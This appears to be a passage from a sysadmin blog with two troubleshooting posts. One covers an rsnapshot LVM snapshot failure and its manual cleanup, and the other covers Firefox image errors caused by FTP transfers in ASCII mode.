[10/Sep/2014:02:07:43] /sbin/lvcreate --snapshot --size 200M --name rsnapshot /dev/vgdata/mylv
[10/Sep/2014:02:07:44] /bin/mount /dev/vgdata/rsnapshot /mnt/lvm-snapshot
[10/Sep/2014:02:07:44] /usr/bin/rsnapshot -c /etc/rsnapshot.backup.conf daily: ERROR: Mount LVM snapshot failed: 8192
[10/Sep/2014:02:07:44] rm -f /var/run/rsnapshot.pid

The reason for the mount error was that the defined mountpoint (/mnt/lvm-snapshot) did not exist. However, after the mount failed, the LV snapshot was not removed...

On the next rsnapshot run, the creation of the LV snapshot failed, because (obviously) it already existed from the previous run:

[10/Sep/2014:09:30:08] /sbin/lvcreate --snapshot --size 200M --name rsnapshot /dev/vgdata/mylv
[10/Sep/2014:09:30:08] /usr/bin/rsnapshot -c /etc/rsnapshot.backup.conf daily: ERROR: Create LVM snapshot failed: 1280
[10/Sep/2014:09:30:08] rm -f /var/run/rsnapshot.pid

To solve this issue, the mountpoint must be created and the logical volume snapshot must be deleted manually. Afterwards, rsnapshot runs correctly again.
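
For this particular case the manual cleanup boils down to something like the following sketch, using the names from the log above (lvremove asks for confirmation before removing the snapshot):

mkdir -p /mnt/lvm-snapshot
lvremove /dev/vgdata/rsnapshot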

This seems to be a bug in rsnapshot, so I opened an issue in the rsnapshot GitHub repository.

 

Firefox displays: The image cannot be displayed because it contains errors
Monday - Sep 8th 2014

Recently I was contacted by a user because the images he had uploaded to his website could not be seen. According to the user, this of course had to be an issue on the server... (arr!)

When I manually loaded the picture, I was a little bit surprised by the error message shown by Firefox:

The image "http://example.com/logo.png" cannot be displayed because it contains errors.

[Screenshot: the Firefox error message]

Testing the same URL in Chrome, the "classic" broken image icon appeared:

[Screenshot: broken image in Chrome]

To prove that it's not a server issue, I uploaded a PNG picture myself and opened its URL. Which worked fine, of course.

By using the "Page Info" on Firefox, additional information was shown about the images. First the working one, uploaded by me:

[Screenshot: Page Info of the working image]

And then the non-working image:

[Screenshot: Page Info of the broken image]

Very interesting here are the reported dimensions. So there's definitely something wrong with the file.

I told the user that there must have been either an FTP transfer error or that the pictures were not created properly. In the end it turned out that the user had transferred the images in ASCII mode instead of binary mode...

Yes, it's always the server! :-)
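
By the way, such a mangled image can usually be spotted right on the server with the file command (the path here is just an example). The PNG signature deliberately contains a CR/LF sequence, so an ASCII-mode transfer typically destroys it and the file is no longer recognized as a PNG:

# a healthy upload is identified as "PNG image data ..."
# an ASCII-mode victim is usually reported as plain "data"
file /var/www/example.com/logo.png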

 

